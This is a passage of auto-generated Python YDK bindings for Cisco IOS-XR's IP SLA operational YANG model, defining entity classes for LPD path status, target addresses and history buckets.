        self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
        self._children_yang_names.add("ipv4-pseudowire-target")
        self._segment_path = lambda: "target-address"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
    """
    IPv4 prefix target.

    Attributes:
        address (str): IPv4 address (dotted-quad pattern).
        mask_length (int, uint8): mask length, range 0..255.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "ipv4-prefix-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('address', YLeaf(YType.str, 'address')),
            ('mask_length', YLeaf(YType.uint8, 'mask-length')),
        ])
        # Leaf values are unset until data is read from the device.
        self.address = None
        self.mask_length = None
        self._segment_path = lambda: "ipv4-prefix-target"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
    """
    Tunnel ID target.

    Attributes:
        tunnel_id (int, uint32): tunnel ID, range 0..4294967295.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "tunnel-id-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
        ])
        # Leaf value is unset until data is read from the device.
        self.tunnel_id = None
        self._segment_path = lambda: "tunnel-id-target"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
# Auto-generated ydk binding for the YANG container 'ipv4-pseudowire-target'
# (IPv4 pseudowire LPD target under the aggregated hour statistics).
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
# YANG module prefix and revision this class was generated from.
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Leaf-only node: no child containers or lists.
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
# Leaf descriptors: python attribute name -> YLeaf(YANG type, YANG leaf name).
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
# Leaf values; None until assigned.
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
# Route attribute writes through the ydk Entity machinery for the
# listed YANG leaf names.
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
# Auto-generated ydk binding for the YANG container 'status' under 'lpd':
# operational status of an LPD (LSP Path Discovery) group, with nested
# bindings for the discovered paths ('lpd-paths') and summary 'state'.
class Status(Entity):
"""
Operational status of LPD group
.. attribute:: lpd_paths
Operational path state in LPD group
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths>`
.. attribute:: state
Operational status of LPD group
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State>`
"""
# YANG module prefix and revision this class was generated from.
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "status"
self.yang_parent_name = "lpd"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child containers (YANG name -> (python name, class)); no leafs here.
self._child_container_classes = OrderedDict([("lpd-paths", ("lpd_paths", Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths)), ("state", ("state", Ipsla.OperationData.Operations.Operation.Lpd.Status.State))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
# Eagerly instantiate child containers and register them with the
# parent-to-child name maps.
self.lpd_paths = Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths()
self.lpd_paths.parent = self
self._children_name_map["lpd_paths"] = "lpd-paths"
self._children_yang_names.add("lpd-paths")
self.state = Ipsla.OperationData.Operations.Operation.Lpd.Status.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._children_yang_names.add("state")
self._segment_path = lambda: "status"
# Container of the keyed 'lpd-path' list entries.
class LpdPaths(Entity):
"""
Operational path state in LPD group
.. attribute:: lpd_path
Current operational path state in LPD group
**type**\: list of :py:class:`LpdPath <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths, self).__init__()
self.yang_name = "lpd-paths"
self.yang_parent_name = "status"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
# Child YANG list: 'lpd-path' entries held in a YList.
self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath))])
self._leafs = OrderedDict()
self.lpd_path = YList(self)
self._segment_path = lambda: "lpd-paths"
# No settable leafs here; writes still funnel through _perform_setattr.
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths, [], name, value)
# One keyed entry of the 'lpd-path' list (key: path_index).
class LpdPath(Entity):
"""
Current operational path state in LPD
group
.. attribute:: path_index (key)
LPD path index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: path_id
LPD path identifier
**type**\: :py:class:`PathId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId>`
.. attribute:: path_status
Path status
**type**\: :py:class:`IpslaMplsLpdPathDiscoveryStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdPathDiscoveryStatus>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath, self).__init__()
self.yang_name = "lpd-path"
self.yang_parent_name = "lpd-paths"
self.is_top_level_class = False
self.has_list_ancestor = True
# List key leaf name(s) used to build the keyed segment path below.
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
('path_status', YLeaf(YType.enumeration, 'path-status')),
])
self.path_index = None
self.path_status = None
self.path_id = Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId()
self.path_id.parent = self
self._children_name_map["path_id"] = "path-id"
self._children_yang_names.add("path-id")
# Keyed list entry: segment path embeds the current path_index value.
self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath, ['path_index', 'path_status'], name, value)
# Identifier of a discovered LPD path (selector, interface, nexthop, labels).
class PathId(Entity):
"""
LPD path identifier
.. attribute:: lsp_selector
LSP selector
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: output_interface
Output interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9./\-]+
.. attribute:: nexthop_address
Nexthop address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: downstream_label
Downstream label stacks
**type**\: list of int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId, self).__init__()
self.yang_name = "path-id"
self.yang_parent_name = "lpd-path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
('output_interface', YLeaf(YType.str, 'output-interface')),
('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
# Leaf-list (multiple values) rather than a single leaf.
('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
])
self.lsp_selector = None
self.output_interface = None
self.nexthop_address = None
self.downstream_label = []
self._segment_path = lambda: "path-id"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
# Summary state of the most recent LPD discovery run.
class State(Entity):
"""
Operational status of LPD group
.. attribute:: target_address
Target for LPD
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress>`
.. attribute:: monitor_id
MPLSLM monitor ID
**type**\: int
**range:** 0..4294967295
.. attribute:: discovery_mode
Latest LPD mode
**type**\: :py:class:`IpslaMplsLpdDiscoveryModeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdDiscoveryModeEnum>`
.. attribute:: start_time
Latest start time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Latest return code
**type**\: :py:class:`IpslaMplsLpdRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdRetCode>`
.. attribute:: completion_time
Latest completion time
**type**\: int
**range:** 0..4294967295
.. attribute:: path_count
Number of discovered paths
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "status"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('monitor_id', YLeaf(YType.uint32, 'monitor-id')),
('discovery_mode', YLeaf(YType.enumeration, 'discovery-mode')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('completion_time', YLeaf(YType.uint32, 'completion-time')),
('path_count', YLeaf(YType.uint32, 'path-count')),
])
self.monitor_id = None
self.discovery_mode = None
self.start_time = None
self.return_code = None
self.completion_time = None
self.path_count = None
self.target_address = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
self._segment_path = lambda: "state"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State, ['monitor_id', 'discovery_mode', 'start_time', 'return_code', 'completion_time', 'path_count'], name, value)
# Union-style target: which member is populated depends on target_type.
class TargetAddress(Entity):
"""
Target for LPD
.. attribute:: ipv4_prefix_target
IPv4 prefix target
**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress, self).__init__()
self.yang_name = "target-address"
self.yang_parent_name = "state"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
# Eagerly instantiate the three structured target alternatives.
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
# IPv4-prefix form of the LPD target.
class Ipv4PrefixTarget(Entity):
"""
IPv4 prefix target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: mask_length
Mask length
**type**\: int
**range:** 0..255
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget, self).__init__()
self.yang_name = "ipv4-prefix-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('mask_length', YLeaf(YType.uint8, 'mask-length')),
])
self.address = None
self.mask_length = None
self._segment_path = lambda: "ipv4-prefix-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
# Tunnel-ID form of the LPD target.
class TunnelIdTarget(Entity):
"""
Tunnel ID target
.. attribute:: tunnel_id
Tunnel ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget, self).__init__()
self.yang_name = "tunnel-id-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
])
self.tunnel_id = None
self._segment_path = lambda: "tunnel-id-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
# IPv4-pseudowire form of the LPD target.
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget, self).__init__()
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Status.State.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class History(Entity):
"""
Historical data for an operation
.. attribute:: path
Historical data with multiple hops along the path
**type**\: :py:class:`Path <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path>`
.. attribute:: target
Historical data for the destination node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build the 'history' container node: register metadata and child
# container classes, then eagerly create the 'path' and 'target' children.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "history"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("path", ("path", Ipsla.OperationData.Operations.Operation.History.Path)), ("target", ("target", Ipsla.OperationData.Operations.Operation.History.Target))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.path = Ipsla.OperationData.Operations.Operation.History.Path()
self.path.parent = self
self._children_name_map["path"] = "path"
self._children_yang_names.add("path")
self.target = Ipsla.OperationData.Operations.Operation.History.Target()
self.target.parent = self
self._children_name_map["target"] = "target"
self._children_yang_names.add("target")
self._segment_path = lambda: "history"
class Path(Entity):
"""
Historical data with multiple hops along the
path
.. attribute:: lifes
Tables of lives for an operation
**type**\: :py:class:`Lifes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build the 'path' container node under 'history'; its only child is
# the 'lifes' container, created eagerly below.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "path"
self.yang_parent_name = "history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("lifes", ("lifes", Ipsla.OperationData.Operations.Operation.History.Path.Lifes))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.lifes = Ipsla.OperationData.Operations.Operation.History.Path.Lifes()
self.lifes.parent = self
self._children_name_map["lifes"] = "lifes"
self._children_yang_names.add("lifes")
self._segment_path = lambda: "path"
class Lifes(Entity):
"""
Tables of lives for an operation
.. attribute:: life
History data for a particular life of the operation
**type**\: list of :py:class:`Life <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build the 'lifes' container: holds the keyed 'life' list in a YList.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "lifes"
self.yang_parent_name = "path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("life", ("life", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life))])
self._leafs = OrderedDict()
self.life = YList(self)
self._segment_path = lambda: "lifes"
# No settable leafs on this node; writes still funnel through the ydk
# Entity machinery (_perform_setattr).
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes, [], name, value)
class Life(Entity):
"""
History data for a particular life of the
operation
.. attribute:: life_index (key)
Life Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: buckets
Table of history buckets (samples) for a particular operation
**type**\: :py:class:`Buckets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build one keyed 'life' list entry (key: life_index) with its
# 'buckets' child container.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "life"
self.yang_parent_name = "lifes"
self.is_top_level_class = False
self.has_list_ancestor = True
# List key leaf used in the keyed segment path below.
self.ylist_key_names = ['life_index']
self._child_container_classes = OrderedDict([("buckets", ("buckets", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('life_index', YLeaf(YType.int32, 'life-index')),
])
self.life_index = None
self.buckets = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets()
self.buckets.parent = self
self._children_name_map["buckets"] = "buckets"
self._children_yang_names.add("buckets")
# Keyed list entry: segment path embeds the current life_index value.
self._segment_path = lambda: "life" + "[life-index='" + str(self.life_index) + "']"
# Route writes to the 'life_index' leaf through the ydk Entity machinery.
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life, ['life_index'], name, value)
class Buckets(Entity):
"""
Table of history buckets (samples) for a
particular operation
.. attribute:: bucket
History bucket for an operation
**type**\: list of :py:class:`Bucket <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build the 'buckets' container: holds the keyed 'bucket' list in a YList.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "buckets"
self.yang_parent_name = "life"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("bucket", ("bucket", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket))])
self._leafs = OrderedDict()
self.bucket = YList(self)
self._segment_path = lambda: "buckets"
# No settable leafs on this node; writes still funnel through the ydk
# Entity machinery (_perform_setattr).
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets, [], name, value)
class Bucket(Entity):
"""
History bucket for an operation
.. attribute:: bucket_index (key)
Bucket Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: samples
Table of samples for a particular cycle
**type**\: :py:class:`Samples <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build one keyed 'bucket' list entry (key: bucket_index) with its
# 'samples' child container.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "bucket"
self.yang_parent_name = "buckets"
self.is_top_level_class = False
self.has_list_ancestor = True
# List key leaf used in the keyed segment path below.
self.ylist_key_names = ['bucket_index']
self._child_container_classes = OrderedDict([("samples", ("samples", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('bucket_index', YLeaf(YType.int32, 'bucket-index')),
])
self.bucket_index = None
self.samples = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples()
self.samples.parent = self
self._children_name_map["samples"] = "samples"
self._children_yang_names.add("samples")
# Keyed list entry: segment path embeds the current bucket_index value.
self._segment_path = lambda: "bucket" + "[bucket-index='" + str(self.bucket_index) + "']"
# Route writes to the 'bucket_index' leaf through the ydk Entity machinery.
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket, ['bucket_index'], name, value)
class Samples(Entity):
"""
Table of samples for a particular cycle
.. attribute:: sample
Data sample for particular cycle
**type**\: list of :py:class:`Sample <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build the 'samples' container: holds the keyed 'sample' list in a YList.
def __init__(self):
